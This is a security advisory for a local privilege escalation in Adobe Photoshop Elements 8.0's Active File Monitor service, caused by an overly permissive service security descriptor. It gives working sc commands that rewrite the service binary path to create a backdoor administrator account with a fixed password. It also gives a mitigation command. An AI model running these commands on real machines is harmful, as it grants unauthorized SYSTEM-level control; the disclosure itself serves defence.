Adobe Photoshop Elements 8.0 Active File Monitor Local Elevation Of Privileges

2009-10-01 / 2009-10-02
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-16


CVSS Base Score: 6.9/10
Impact Subscore: 10/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges by Nine:Situations:Group::bellick site: http://retrogod.altervista.org/ Tested on Microsoft Windows XP SP3 The "Adobe Active File Monitor V8" service is installed with an improper security descriptor. A malicious user of the Users group (which on xp means a "limited account") can stop the service, then invoke the "sc config" command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges ex., run theese commands as a limited user: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add" sc start "AdobeActiveFileMonitor8.0" runas /noprofile /user:%COMPUTERNAME%\adobe cmd now login as administrator with password "kills" mitigation: the security descriptor of the service is like this: C:\>sc sdshow "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CC LCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWD WO;;;WD) note the WO and WD permission for Everyone (!!!!!) change the security descriptor like the following: c:\sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSD RCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY) [SC] SetServiceObjectSecurity SUCCESS readings, interesting article: http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-sp ecific-service-windows.aspx original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html

References:

http://www.securityfocus.com/bid/36542
http://www.securityfocus.com/archive/1/archive/1/506806/100/0/threaded
http://retrogod.altervista.org/9sg_adobe_pe_local.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top